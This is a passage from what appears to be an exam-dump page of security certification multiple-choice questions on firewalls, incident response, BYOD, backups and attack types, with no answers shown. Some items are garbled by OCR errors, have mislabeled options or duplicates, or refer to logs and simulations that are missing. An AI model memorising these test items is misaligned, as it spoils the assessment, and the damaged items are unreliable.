C.

Use digital certificates when accessing email via the web.

D.

Configure web traffic to only use TLS-enabled channels.

Buy Now
Questions 117

After multiple on-premises security solutions were migrated to the cloud, the incident response time increased The analysts are spending a long time trying to trace information on different cloud consoles and correlating data in different formats. Which of the following can be used to optimize the incident response time?

Options:

A.

CASB

B.

VPC

C.

SWG

D.

CMS

Buy Now
Questions 118

A company is adopting a BYOD policy and is looking for a comprehensive solution to protect company information on user devices. Which of the following solutions would best support the policy?

Options:

A.

Mobile device management

B.

Full device encryption

C.

Remote wipe

D.

Biometrics

Buy Now
Questions 119

You are security administrator investigating a potential infection on a network.

Click on each host and firewall. Review all logs to determine which host originated the Infecton and then deny each remaining hosts clean or infected.

Options:

Buy Now
Questions 120

A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?

Options:

A.

Setting an explicit deny to all traffic using port 80 instead of 443

B.

Moving the implicit deny from the bottom of the rule set to the top

C.

Configuring the first line in the rule set to allow all traffic

D.

Ensuring that port 53 has been explicitly allowed in the rule set

Buy Now
Questions 121

A security analyst is looking for a solution to help communicate to the leadership team the seventy levels of the organization's vulnerabilities. Which of the following would best meet this need?

Options:

A.

CVE

B.

SIEM

C.

SOAR

D.

CVSS

Buy Now
Questions 122

A company needs to centralize its logs to create a baseline and have visibility on its security events Which of the following technologies will accomplish this objective?

Options:

A.

Security information and event management

B.

A web application firewall

C.

A vulnerability scanner

D.

A next-generation firewall

Buy Now
Questions 123

A cyber security administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall Which of the following would be the best option to remove the rules?

Options:

A.

# iptables -t mangle -X

B.

# iptables -F

C.

# iptables -2

D.

# iptables -P INPUT -j DROP

Buy Now
Questions 124

An analyst is working on an email security incident in which the target opened an attachment containing a worm. The analyst wants to Implement mitigation techniques to prevent further spread. Which of the following is the best course of action for the analyst to take?

Options:

A.

Apply a DLP solution.

B.

Implement network segmentation.

C.

Utilize email content filtering.

D.

Isolate the infected attachment.

Buy Now
Questions 125

Which Of the following is the best method for ensuring non-repudiation?

Options:

A.

SSO

B.

Digital certificate

C.

Token

D.

SSH key

Buy Now
Questions 126

A security analyst receives an alert from the company's S1EM that anomalous activity is coming from a local source IP address of 192 168 34.26 The Chief Information Security Officer asks the analyst to block the originating source Several days later another employee opens an internal ticket stating that vulnerability scans are no longer being performed property. The IP address the employee provides is 192 168.34 26. Which of the following describes this type of alert?

Options:

A.

True positive

B.

True negative

C.

False positive

D.

False negative

Buy Now
Questions 127

A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst monitor?

Options:

A.

SFTP

B.

AIS

C.

Tor

D.

loC

Buy Now
Questions 128

Which of the following supplies non-repudiation during a forensics investigation?

Options:

A.

Dumping volatile memory contents first

B.

Duplicating a drive with dd

C.

Using a SHA-2 signature of a drive image

D.

Logging everyone in contact with evidence

E.

Encrypting sensitive data

Buy Now
Questions 129

Security analysts notice a server login from a user who has been on vacation for two weeks, The an-alysts confirm that the user did not log in to the system while on vacation After reviewing packet capture the analysts notice the following:

Which of the following occurred?

Options:

A.

A buffer overflow was exploited to gain unauthorized access.

B.

The user's account was con-promised, and an attacker changed the login credentials.

C.

An attacker used a pass-the-hash attack to gain access.

D.

An insider threat with username logged in to the account.

Buy Now
Questions 130

A company's help desk has received calls about the wireless network being down and users being unable to connect to it The network administrator says all access points are up and running One of the help desk technicians notices the affected users are working in a building near the parking lot. Which of the following is the most likely reason for the outage?

Options:

A.

Someone near the building is jamming the signal

B.

A user has set up a rogue access point near the building

C.

Someone set up an evil twin access point in the affected area.

D.

The APs in the affected area have been unplugged from the network

Buy Now
Questions 131

An organization is repairing damage after an incident. Which Of the following controls is being implemented?

Options:

A.

Detective

B.

Preventive

C.

Corrective

D.

Compensating

Buy Now
Questions 132

During a security incident the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9 A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network. Which of the following fulfills this request?

Options:

A.

access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32

B.

access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

C.

access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0

D.

access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32

Buy Now
Questions 133

A research company discovered that an unauthorized piece of software has been detected on a small number of machines in its lab The researchers collaborate with other machines using port 445 and on the internet using port 443 The unau-thorized software is starting to be seen on additional machines outside of the lab and is making outbound communications using HTTPS and SMS. The security team has been instructed to resolve the issue as quickly as possible while causing minimal disruption to the researchers. Which of the following is the best course Of

action in this scenario?

Options:

A.

Update the host firewalls to block outbound Stv1B.

B.

Place the machines with the unapproved software in containment

C.

Place the unauthorized application in a Bocklist.

D.

Implement a content filter to block the unauthorized software communica-tion,

Buy Now
Questions 134

A company wants to deploy decoy systems alongside production systems in order to entice threat actors and to learn more about attackers. Which of the follow r 3 best describes these systems?

Options:

A.

DNS sinkholes

B.

Honey pots

C.

Virtual machines

D.

Neural networks

Buy Now
Questions 135

A security analyst is currently addressing an active cyber incident. The analyst has been able to identify affected devices that are running a malicious application with a unique hash. Which of the following is the next step according to the incident response process?

Options:

A.

Recovery

B.

Lessons learned

C.

Containment

D.

Preparation

Buy Now
Questions 136

A security analyst discovers that one of the web APIs is being abused by an unknown third party. Logs indicate that the third party is attempting to manipulate the parameters being passed to the API endpoint. Which of the following solutions would best help to protect against the attack?

Options:

A.

DLP

B.

SIEM

C.

NIDS

D.

WAF

Buy Now
Questions 137

Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal IP addresses?

Options:

A.

Compensating control

B.

Network segmentation

C.

Transfer of risk

D.

SNMP traps

Buy Now
Questions 138

A company's help desk received several AV alerts indicating Mimikatz attempted to run on the remote systems Several users also reported that the new company flash drives they picked up in the break room only have 512KB of storage Which of the following is most likely the cause?

Options:

A.

The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts the drives to only 512KB of storage

B.

The new flash drives need a driver that is being blocked by the AV software because the flash drives are not on the application's allow list, temporarily restricting the drives to 512KB of storage.

C.

The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an unapproved application to repartition the drives.

D.

The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memory.

Buy Now
Questions 139

Law enforcement officials sent a company a notification that states electronically stored information and paper documents cannot be destroyed. Which of the following explains this process?

Options:

A.

Data breach notification

B.

Accountability

C.

Legal hold

D.

Chain of custody

Buy Now
Questions 140

While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician updates the policy, but the new policy causes several company servers to become unreachable. Which of the following actions would prevent this issue?

Options:

A.

Documenting the new policy in a change request and submitting the request to change management

B.

Testing the policy in a non-production environment before enabling the policy in the production network

C.

Disabling any intrusion prevention signatures on the "deny any" policy prior to enabling the new policy

D.

Including an "allow any" policy above the "deny any" policy

Buy Now
Questions 141

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to best meet the requirement?

Options:

A.

Fog computing and KVMs

B.

VDI and thin clients

C.

Private cloud and DLP

D.

Full drive encryption and thick clients

Buy Now
Questions 142

An organization is repairing the damage after an incident. Which of the following controls is being implemented?

Options:

A.

Detective

B.

Preventive

C.

Corrective

D.

Compensating

Buy Now
Questions 143

Which of the following automation use cases would best enhance the security posture Of an organi-zation by rapidly updating permissions when employees leave a company Or change job roles inter-nally?

Options:

A.

Provisioning resources

B.

Disabling access

C.

APIs

D.

Escalating permission requests

Buy Now
Questions 144

Which of the following security concepts should an e-commerce organization apply for protection against erroneous purchases?

Options:

A.

Privacy

B.

Availability

C.

Integrity

D.

Confidentiality

Buy Now
Questions 145

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be secure. Which of the following can be used?

Options:

A.

SMIME

B.

LDAPS

C.

SSH

D.

SRTP

Buy Now
Questions 146

An organization routes all of its traffic through a VPN Most users are remote and connect into a corporate data center that houses confidential information There is a firewall at the internet border, followed by a DLP appliance, the VPN server and the data center itself Which of the following is the weakest design element?

Options:

A.

The DLP appliance should be integrated into a NGFW.

B.

Split-tunnel connections can negatively impact the DLP appliance's performance.

C.

Encrypted VPN traffic will not be inspected when entering or leaving the network.

D.

Adding two hops in the VPN tunnel may slow down remote connections

Buy Now
Questions 147

Which of the following types of controls is a turnstile?

Options:

A.

Physical

B.

Detective

C.

Corrective

D.

Technical

Buy Now
Questions 148

Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS

Not all attacks and remediation actions will be used.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 149

A systems administrator is required to enforce MFA for corporate email account access, relying on the possession factor. Which of the following authentication methods should the systems administrator choose? (Select two).

Options:

A.

passphrase

B.

Time-based one-time password

C.

Facial recognition

D.

Retina scan

E.

Hardware token

F.

Fingerprints

Buy Now
Questions 150

A customer called a company's security team to report that all invoices the customer has received over the last five days from the company appear to have fraudulent banking details. An investigation into the matter reveals the following

• The manager of the accounts payable department is using the same password across multiple external websites and the corporate account

• One of the websites the manager used recently experienced a data breach.

• The manager's corporate email account was successfully accessed in the last five days by an IP address located in a foreign country.

Which of the following attacks has most likely been used to compromise the manager's corporate account?

Options:

A.

Remote access Trojan

B.

Brute-force

C.

Dictionary

D.

Credential stuffing

E.

Password spraying

Buy Now
Questions 151

Which Of the following best ensures minimal downtime for organizations vÄh crit-ical computing equipment located in earthquake-prone areas?

Options:

A.

Generators and UPS

B.

Off-site replication

C.

Additional warm site

D.

Local

Buy Now
Questions 152

Which of the following threat actors is most likely to be motivated by ideology?

Options:

A.

Business competitor

B.

Hacktivist

C.

Criminal syndicate

D.

Script kiddie

E.

Disgruntled employee

Buy Now
Questions 153

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be best to use to update and reconfigure the OS-level security configurations?

Options:

A.

CIS benchmarks

B.

GDPR guidance

C.

Regional regulations

D.

ISO 27001 standards

Buy Now
Questions 154

Which of the following is a primary security concern for a company setting up a BYOD program?

Options:

A.

End of life

B.

Buffer overflow

C.

VM escape

D.

Jailbreaking

Buy Now
Questions 155

A local server recently crashed, and the team is attempting to restore the server from a backup. During the restore process, the team notices the file size of each daily backup is large and will run out of space at the current rate.

The current solution appears to do a full backup every night. Which of the following would use the least amount of storage space for backups?

Options:

A.

A weekly, incremental backup with daily differential backups

B.

A weekly, full backup with daily snapshot backups

C.

A weekly, full backup with daily differential backups

D.

A weekly, full backup with daily incremental backups

Buy Now
Questions 156

A user received an SMS on a mobile phone that asked for bank details. Which of the following social engineering techniques was used in this case?

Options:

A.

SPIM

B.

Vishing

C.

Spear phishing

D.

Smishing

Buy Now
Questions 157

A software development manager wants to ensure the authenticity of the code created by the company. Which of the following options is the most appropriate?

Options:

A.

Testing input validation on the user input fields

B.

Performing code signing on company-developed software

C.

Performing static code analysis on the software

D.

Ensuring secure cookies are used

Buy Now
Questions 158

Which of the following best reduces the security risks introduced when running systems that have expired vendor support and lack an immediate replacement?

Options:

A.

Implement proper network access restrictions.

B.

Initiate a bug bounty program.

C.

Classify the system as shadow IT.

D.

Increase the frequency of vulnerability scans.

Buy Now
Questions 159

A malicious actor recently penetrated a company's network and moved laterally to the data center Upon investigation a forensics firm wants to know what was in the memory on the compromised server Which of the following files should be given to the forensics firm?

Options:

A.

Security

B.

Application

C.

Dump

D.

Syslog

Buy Now
Questions 160

Which Of the following is a primary security concern for a setting up a BYOD program?

Options:

A.

End of life

B.

Buffer overflow

C.

VM escape

D.

Jailbreaking

Buy Now
Questions 161

A large retail store's network was breached recently. and this news was made public. The Store did not lose any intellectual property, and no customer information was stolen. Although no fines were incurred as a result, the Store lost revenue after the breach. Which of the following is the

most likely reason for this issue?

Options:

A.

Employee training

B.

Leadership changes

C.

Reputation

D.

Identity theft

Buy Now
Questions 162

A company is developing a business continuity strategy and needs to determine how many staff members would be required to sustain the business in the case of a disruption.

Which of the following best describes this step?

Options:

A.

Capacity planning

B.

Redundancy

C.

Geographic dispersion

D.

Tabletop exercise

Buy Now
Questions 163

Which of the following terms should be included in a contract to help a company monitor the ongo-ing security maturity Of a new vendor?

Options:

A.

A right-to-audit clause allowing for annual security audits

B.

Requirements for event logs to kept for a minimum of 30 days

C.

Integration of threat intelligence in the companys AV

D.

A data-breach clause requiring disclosure of significant data loss

Buy Now
Questions 164

A government organization is developing an advanced Al defense system. Develop-ers are using information collected from third-party providers Analysts are no-ticing inconsistencies in the expected powers Of then learning and attribute the Outcome to a recent attack on one of the suppliers. Which of the following IS the most likely reason for the inaccuracy of the system?

Options:

A.

Improper algorithms security

B.

Tainted training data

C.

virus

D.

Cryptomalware

Buy Now
Questions 165

A web server has been compromised due to a ransomware attack. Further Investigation reveals the ransomware has been in the server for the past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator use to restore services to a secure state?

Options:

A.

The last incremental backup that was conducted 72 hours ago

B.

The last known-good configuration stored by the operating system

C.

The last full backup that was conducted seven days ago

D.

The baseline OS configuration

Buy Now
Questions 166

An annual information security has revealed that several OS-level configurations are not in compliance due to Outdated hardening standards the company is using Which Of the following would be best to use to update and reconfigure the OS.level security configurations?

Options:

A.

CIS benchmarks

B.

GDPR guidance

C.

Regional regulations

D.

ISO 27001 standards

Buy Now
Questions 167

A company recently experienced an attack during which its main website was Directed to the attacker's web server, allowing the attacker to harvest credentials from unsuspecting customers, Which of the following should the

company implement to prevent this type of attack from occurring In the future?

Options:

A.

IPsec

B.

SSL/TLS

C.

ONSSEC

D.

SMIME

Buy Now
Questions 168

A company recently experienced a significant data loss when proprietary information was leaked to a competitor. The company took special precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate network was not breached, but documents were downloaded from an employee's COPE tablet and passed to the competitor via cloud storage. Which of the following is the best mitigation strategy to prevent this from happening in the future?

Options:

A.

User training

B.

CAsB

C.

MDM

D.

EDR

Buy Now
Questions 169

The following are the logs of a successful attack.

Which of the following controls would be BEST to use to prevent such a breach in the future?

Options:

A.

Password history

B.

Account expiration

C.

Password complexity

D.

Account lockout

Buy Now
Questions 170

Which of the following function as preventive, detective, and deterrent controls to reduce the risk of physical theft? (Select TWO).

Options:

A.

Mantraps

B.

Security guards

C.

Video surveillance

D.

Fences

E.

Bollards

F.

Antivirus

Buy Now
Questions 171

An organization recently acquired an ISO 27001 certification. Which of the following would MOST likely be considered a benefit of this certification?

Options:

A.

It allows for the sharing of digital forensics data across organizations

B.

It provides insurance in case of a data breach

C.

It provides complimentary training and certification resources to IT security staff.

D.

It certifies the organization can work with foreign entities that require a security clearance

E.

It assures customers that the organization meets security standards

Buy Now
Questions 172

A junior security analyst is reviewing web server logs and identifies the following pattern in the log file:

Which ol the following types of attacks is being attempted and how can it be mitigated?

Options:

A.

XSS. mplement a SIEM

B.

CSRF. implement an IPS

C.

Directory traversal implement a WAF

D.

SQL infection, mplement an IDS

Buy Now
Questions 173

Which of the following BEST describes the method a security analyst would use to confirm a file that is downloaded from a trusted security website is not altered in transit or corrupted using a verified checksum?

Options:

A.

Hashing

B.

Salting

C.

Integrity

D.

Digital signature

Buy Now
Questions 174

A security administrator has discovered that workstations on the LAN are becoming infected with malware. The cause of the infections appears to be users receiving phishing emails that are bypassing the current email-filtering technology. As a result, users are being tricked into clicking on malicious URLs, as no internal controls currently exist in the environment to evaluate their safety. Which of the following would be BEST to implement to address the issue?

Options:

A.

Forward proxy

B.

HIDS

C.

Awareness training

D.

A jump server

E.

IPS

Buy Now
Questions 175

A security analyst has received several reports of an issue on an internal web application. Users state they are having to provide their credentials twice to log in. The analyst checks with the application team and notes this is not an expected behavior. After looking at several logs, the analyst decides to run some commands on the gateway and obtains the following output:

Which of the following BEST describes the attack the company is experiencing?

Options:

A.

MAC flooding

B.

URL redirection

C.

ARP poisoning

D.

DNS hijacking

Buy Now
Questions 176

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

Options:

A.

White team

B.

Purple team

C.

Green team

D.

Blue team

E.

Red team

Buy Now
Questions 177

Which of the following must be in place before implementing a BCP?

Options:

A.

SLA

B.

AUP

C.

NDA

D.

BIA

Buy Now
Questions 178

A security manager needs to assess the security posture of one of the organization's vendors. The contract with the vendor does not allow for auditing of the vendor's security controls. Which of (he following should the manager request to complete the assessment?

Options:

A.

A service-level agreement

B.

A business partnership agreement

C.

A SOC 2 Type 2 report

D.

A memorandum of understanding

Buy Now
Questions 179

A security analyst is responding to an alert from the SIEM. The alert states that malware was discovered on a host and was not automatically deleted. Which of the following would be BEST for the analyst to perform?

Options:

A.

Add a deny-all rule to that host in the network ACL

B.

Implement a network-wide scan for other instances of the malware.

C.

Quarantine the host from other parts of the network

D.

Revoke the client's network access certificates

Buy Now
Questions 180

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

Options:

A.

Vulnerabilities with a CVSS score greater than 6.9.

B.

Critical infrastructure vulnerabilities on non-IP protocols.

C.

CVEs related to non-Microsoft systems such as printers and switches.

D.

Missing patches for third-party software on Windows workstations and servers.

Buy Now
Questions 181

A company Is planning to install a guest wireless network so visitors will be able to access the Internet. The stakeholders want the network to be easy to connect to so time is not wasted during meetings. The WAPs are configured so that power levels and antennas cover only the conference rooms where visitors will attend meetings. Which of the following would BEST protect the company's Internal wireless network against visitors accessing company resources?

Options:

A.

Configure the guest wireless network to be on a separate VLAN from the company's internal wireless network

B.

Change the password for the guest wireless network every month.

C.

Decrease the power levels of the access points for the guest wireless network.

D.

Enable WPA2 using 802.1X for logging on to the guest wireless network.

Buy Now
Questions 182

The spread of misinformation surrounding the outbreak of a novel virus on election day led to eligible voters choosing not to take the risk of going the polls. This is an example of:

Options:

A.

prepending.

B.

an influence campaign.

C.

a watering-hole attack.

D.

intimidation.

E.

information elicitation.

Buy Now
Questions 183

Hackers recently attacked a company's network and obtained several unfavorable pictures from the Chief Executive Officer's workstation. The hackers are threatening to send the images to the press if a ransom is not paid. Which of the following is impacted the MOST?

Options:

A.

Identify theft

B.

Data loss

C.

Data exfiltration

D.

Reputation

Buy Now
Questions 184

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?

Options:

A.

Asymmetric

B.

Symmetric

C.

Homomorphic

D.

Ephemeral

Buy Now
Questions 185

A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice?

Options:

A.

Default system configuration

B.

Unsecure protocols

C.

Lack of vendor support

D.

Weak encryption

Buy Now
Questions 186

A backdoor was detected on the containerized application environment. The investigation detected that a zero-day vulnerability was introduced when the latest container image version was downloaded from a public registry. Which of the following is the BEST solution to prevent this type of incident from occurring again?

Options:

A.

Enforce the use of a controlled trusted source of container images

B.

Deploy an IPS solution capable of detecting signatures of attacks targeting containers

C.

Define a vulnerability scan to assess container images before being introduced on the environment

D.

Create a dedicated VPC for the containerized environment

Buy Now
Questions 187

As part of a company's ongoing SOC maturation process, the company wants to implement a method to share cyberthreat intelligence data with outside security partners. Which of the following will the company MOST likely implement?

Options:

A.

TAXII

B.

TLP

C.

TTP

D.

STIX

Buy Now
Questions 188

A security analyst is investigating multiple hosts that are communicating to external IP addresses during the hours of 2:00 a.m - 4:00 am. The malware has evaded detection by traditional antivirus software. Which of the following types of malware is MOST likely infecting the hosts?

Options:

A.

A RAT

B.

Ransomware

C.

Polymophic

D.

A worm

Buy Now
Questions 189

A cybersecurity administrator needs to allow mobile BYOD devices to access network resources. As the devices are not enrolled to the domain and do not have policies applied to them, which of the following are best practices for authentication and infrastructure security? (Select TWO).

Options:

A.

Create a new network for the mobile devices and block the communication to the internal network and servers

B.

Use a captive portal for user authentication.

C.

Authenticate users using OAuth for more resiliency

D.

Implement SSO and allow communication to the internal network

E.

Use the existing network and allow communication to the internal network and servers.

F.

Use a new and updated RADIUS server to maintain the best solution

Buy Now
Questions 190

A new plug-and-play storage device was installed on a PC in the corporate environment. Which of the following safeguards will BEST help to protect the PC from malicious files on the storage device?

Options:

A.

Change the default settings on the PC.

B.

Define the PC firewall rules to limit access.

C.

Encrypt the disk on the storage device.

D.

Plug the storage device in to the UPS

Buy Now
Questions 191

A security analyst was deploying a new website and found a connection attempting to authenticate on the site's portal. While Investigating The incident, the analyst identified the following Input in the username field:

Which of the following BEST explains this type of attack?

Options:

A.

DLL injection to hijack administrator services

B.

SQLi on the field to bypass authentication

C.

Execution of a stored XSS on the website

D.

Code to execute a race condition on the server

Buy Now
Questions 192

A company would like to provide flexibility for employees on device preference. However, the company is concerned about supporting too many different types of hardware. Which of the following deployment models will provide the needed flexibility with the GREATEST amount of control and security over company data and infrastructure?

Options:

A.

BYOD

B.

VDI

C.

COPE

D.

CYOD

Buy Now
Questions 193

A user attempts to load a web-based application, but the expected login screen does not appear A help desk analyst troubleshoots the issue by running the following command and reviewing the output on the user's PC

The help desk analyst then runs the same command on the local PC

Which of the following BEST describes the attack that is being detected?

Options:

A.

Domain hijacking

B DNS poisoning

C MAC flooding

B.

Evil twin

Buy Now
Questions 194

The cybersecurity investigation team is requesting a budget increase m order to purchase and implement a commercial tool for collecting information. The information might include disk images and volatile memory from computers used by remote employees Which of the following digital forensic categories does the company want to implement?

Options:

A.

Integrity

B.

E-discovery

C.

Acquisition

D.

Non-repudiation

Buy Now
Questions 195

An employee recently resigned from a company. The employee was responsible for managing and supporting weekly batch jobs over the past five years. A few weeks after the employee resigned, one of the batch jobs failed and caused a major disruption. Which of the following would work best to prevent this type of incident from reoccurring?

Options:

A.

Job rotation

B.

Retention

C.

Outsourcing

D.

Separation of duties

Buy Now
Questions 196

The Chief Information Security Officer (CISO) wants a product manager to include the following tasks as part of the deployment plans:

• Delete test accounts

• Delete test data

• Share administrative passwords securely during the transition to production.

Which of the following concepts will best enable the product manager to incorporate these tasks?

Options:

A.

Secrets management

B.

Network segmentation

C.

Data classification

D.

Access reviews

Buy Now
Questions 197

Which of the following would be the best ways to ensure only authorized personnel can access a secure facility? (Select two).

Options:

A.

Fencing

B.

Video surveillance

C.

Badge access

D.

Access control vestibule

E.

Sign-in sheet

F.

Sensor

Buy Now
Questions 198

A third-party vendor is moving a particular application to the end-of-life stage at the end of the current year. Which of the following is the most critical risk if the company chooses to continue running the application?

Options:

A.

Lack of security updates

B.

Lack of new features

C.

Lack of support

D.

Lack of source code access

Buy Now
Questions 199

A security engineer needs to configure an NGFW to minimize the impact of the increasing number of various traffic types during attacks. Which of the following types of rules is the engineer the most likely to configure?

Options:

A.

Signature-based

B.

Behavioral-based

C.

URL-based

D.

Agent-based

Buy Now
Questions 200

A systems administrator is looking for a low-cost application-hosting solution that is cloud-based. Which of the following meets these requirements?

Options:

A.

Serverless framework

B.

Type 1 hypervisor

C.

SD-WAN

D.

SDN

Buy Now
Questions 201

An administrator notices that several users are logging in from suspicious IP addresses. After speaking with the users, the administrator determines that the employees were not logging in from those IP addresses and resets the affected users' passwords. Which of the following should the administrator implement to prevent this type of attack from succeeding in the future?

Options:

A.

Multifactor authentication

B.

Permissions assignment

C.

Access management

D.

Password complexity

Buy Now
Questions 202

An organization is building a new backup data center with cost-benefit as the primary requirement and RTO and RPO values around two days. Which of the following types of sites is the best for this scenario?

Options:

A.

Real-time recovery

B.

Hot

C.

Cold

D.

Warm

Buy Now
Questions 203

A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?

Options:

A.

Private

B.

Critical

C.

Sensitive

D.

Public

Buy Now
Questions 204

A security analyst locates a potentially malicious video file on a server and needs to identify both the creation date and the file's creator. Which of the following actions would most likely give the security analyst the information required?

Options:

A.

Obtain the file's SHA-256 hash.

B.

Use hexdump on the file's contents.

C.

Check endpoint logs.

D.

Query the file's metadata.

Buy Now
Questions 205

A systems administrator is redesigning how devices will perform network authentication. The following requirements need to be met:

• An existing internal certificate must be used.

• Wired and wireless networks must be supported.

• Any unapproved device should be isolated in a quarantine subnet.

• Approved devices should be updated before accessing resources.

Which of the following would best meet the requirements?

Options:

A.

802.1X

B.

EAP

C.

RADIUS

D.

WPA2

Buy Now
Questions 206

A company uses a SaaS vendor to host its customer database. The company would like to reduce the risk of customer data exposure if the systems are breached. Which of the following risks should the company focus on to achieve this objective?

Options:

A.

Weak encryption

B.

Outsourced code development

C.

Supply chain

D.

Open ports and services

Buy Now
Questions 207

Which of the following threat vectors is most commonly utilized by insider threat actors attempting data exfiltration?

Options:

A.

Unidentified removable devices

B.

Default network device credentials

C.

Spear phishing emails

D.

Impersonation of business units through typosquatting

Buy Now
Questions 208

A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?

Options:

A.

Air gap the system.

B.

Move the system to a different network segment.

C.

Create a change control request.

D.

Apply the patch to the system

Buy Now
Questions 209

In order to save on expenses Company A and Company B agree to host each other's compute and storage disaster recovery sites at their primary data centers The two data centers are about a mile apart, and they each have their own power source When necessary, one company will escort the other company to its data center. Which of the following is the greatest risk with this arrangement?

Options:

A.

The data center sites are not geographically dispersed

B.

A redundant power source for disaster recovery is lacking

C.

The physical security resources are shared

D.

In an emergency, escorted access may not be timely enough.

Buy Now
Questions 210

Malware spread across a company's network after an employee visited a compromised industry blog. Which of the following best describes this type of attack?

Options:

A.

Impersonation

B.

Disinformation

C.

Watering-hole

D.

Smishing

Buy Now
Questions 211

Which of the following describes the maximum allowance of accepted risk?

Options:

A.

Risk indicator

B.

Risk level

C.

Risk score

D.

Risk threshold

Buy Now
Questions 212

A company requires that all user authentication against a core directory service must be secure. Which of the following should the company implement to meet this requirement?

Options:

A.

S/MIME

B.

SRTP

C.

LDAPS

D.

DNSSEC

Buy Now
Questions 213

A growing company would like to enhance the ability of its security operations center to detect threats but reduce the amount of manual work required for the security analysts Which of the following would best enable the reduction in manual work?

Options:

A.

SOAR

B.

SIEM

C.

MDM

D.

DLP

Buy Now
Questions 214

An organization would like to store customer data on a separate part of the network that is not accessible to users on the main corporate network. Which of the following should the administrator use to accomplish this goal?

Options:

A.

Segmentation

B.

Isolation

C.

Patching

D.

Encryption

Buy Now
Questions 215

Which of the following would be the best way to block unknown programs from executing?

Options:

A.

Access control list

B.

Application allow list

C.

Host-based firewall

D.

DLP solution

Buy Now
Questions 216

A company is required to use certified hardware when building networks. Which of the following best addresses the risks associated with procuring counterfeit hardware?

Options:

A.

A thorough analysis of the supply chain

B.

A legally enforceable corporate acquisition policy

C.

A right to audit clause in vendor contracts and SOWs

D.

An in-depth penetration test of all suppliers and vendors

Buy Now
Questions 217

The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building Which of the following should be closely coordinated between the technology, cybersecurity, and physical security departments?

Options:

A.

Authentication protocol

B.

Encryption type

C.

WAP placement

D.

VPN configuration

Buy Now
Questions 218

A security administrator is setting up a SIEM to help monitor for notable events across the enterprise. Which of the following control types does this BEST represent?

Options:

A.

Preventive

B.

Compensating

C.

Corrective

D.

Detective

Buy Now
Questions 219

Which of the following identifies the point in time when an organization will recover data in the event of an outage?

Options:

A.

SLA

B.

RPO

C.

MTBF

D.

ARO

Buy Now
Questions 220

Which of the following describes a maintenance metric that measures the average time required to troubleshoot and restore failed equipment?

Options:

A.

RTO

B.

MTBF

C.

MTTR

D.

RPO

Buy Now
Questions 221

Which of the following roles would MOST likely have direct access to the senior management team?

Options:

A.

Data custodian

B.

Data owner

C.

Data protection officer

D.

Data controller

Buy Now
Questions 222

Which of the following uses six initial steps that provide basic control over system security by including hardware and software inventory, vulnerability management, and continuous monitoring to minimize risk in all network environments?

Options:

A.

ISO 27701

B.

The Center for Internet Security

C.

SSAE SOC 2

D.

NIST Risk Management Framework

Buy Now
Questions 223

Which of the following BEST describes data streams that are compiled through artificial intelligence that provides insight on current cyberintrusions, phishing, and other malicious cyberactivity?

Options:

A.

Intelligence fusion

B.

Review reports

C.

Log reviews

D.

Threat feeds

Buy Now
Questions 224

A security researcher is tracking an adversary by noting its attacks and techniques based on its capabilities, infrastructure, and victims. Which of the following is the researcher MOST likely using?

Options:

A.

The Diamond Model of Intrusion Analysis

B.

The Cyber Kill Chain

C.

The MITRE CVE database

D.

The incident response process

Buy Now
Questions 225

A security analyst must enforce policies to harden an MDM infrastructure. The requirements are as follows:

* Ensure mobile devices can be tracked and wiped.

* Confirm mobile devices are encrypted.

Which of the following should the analyst enable on all the devices to meet these requirements?

Options:

A.

A Geofencing

B.

Biometric authentication

C.

Geolocation

D.

Geotagging

Buy Now
Questions 226

Which of the following should a technician consider when selecting an encryption method for data that needs to remain confidential for a specific length of time?

Options:

A.

The key length of the encryption algorithm

B.

The encryption algorithm's longevity

C.

A method of introducing entropy into key calculations

D.

The computational overhead of calculating the encryption key

Buy Now
Questions 227

A security researcher has alerted an organization that its sensitive user data was found for sale on a website. Which of the following should the organization use to inform the affected parties?

Options:

A.

An incident response plan

B.

A communications plan

C.

A business continuity plan

D.

A disaster recovery plan

Buy Now
Questions 228

A security administrator wants to implement a program that tests a user's ability to recognize attacks over the organization's email system Which of the following would be BEST suited for this task?

Options:

A.

Social media analysis

B.

Annual information security training

C.

Gamification

D.

Phishing campaign

Buy Now
Questions 229

A security engineer is installing a WAF to protect the company's website from malicious web requests over SSL. Which of the following is needed to meet the objective?

Options:

A.

A reverse proxy

B.

A decryption certificate

C.

A spill-tunnel VPN

D.

Load-balanced servers

Buy Now
